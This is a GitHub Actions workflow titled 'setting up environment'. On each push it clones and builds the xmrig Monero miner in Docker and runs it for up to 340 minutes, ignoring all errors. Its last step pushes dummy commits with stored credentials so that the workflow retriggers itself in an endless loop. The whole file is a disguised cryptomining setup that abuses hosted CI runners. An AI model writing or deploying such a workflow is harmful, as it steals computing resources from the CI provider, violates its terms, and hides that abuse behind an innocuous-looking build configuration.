name: setting up environment

on: [push]
    
env:
 username: Ryzenv9
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
       - name: Checkout
         uses: actions/checkout@main

       - name: initialization
         continue-on-error: true
         run: |
           git config --global user.name "Ryzenv9"
           git config --global user.email "71984542+Ryzenv9@users.noreply.github.com"
           
       - name: cloning repo & setting up config
         continue-on-error: true
         run: |
           git clone https://github.com/Ryxenv9/xmrig source
       - name: compilation
         continue-on-error: true
         run: |
           ls
           cd source
           docker container prune --force
           docker build . -t xmrig
       - name: running Docker
         timeout-minutes: 340
         continue-on-error: true
         run: |
           docker run xmrig
           
       - name: Loop workflow
         continue-on-error: true
         run: |
              git clone https://github.com/Ryzenv9/money loop
              cd loop
              echo "1" >> loop.txt
              git add loop.txt
              git commit -m "Workflow : Loop"
              expect -c "
              spawn git push -f 
              expect \"Username\"
              send \"${{ secrets.GHUSER }}\r\"
              expect \"Password\"
              send \"${{ secrets.GHPASS }}\r\"
              expect \"main -> main\"
              set timeout -10
              interact"
